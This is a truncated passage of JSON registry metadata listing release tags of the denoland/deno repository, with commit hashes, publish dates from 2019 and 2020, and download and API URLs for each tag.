ownload_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repo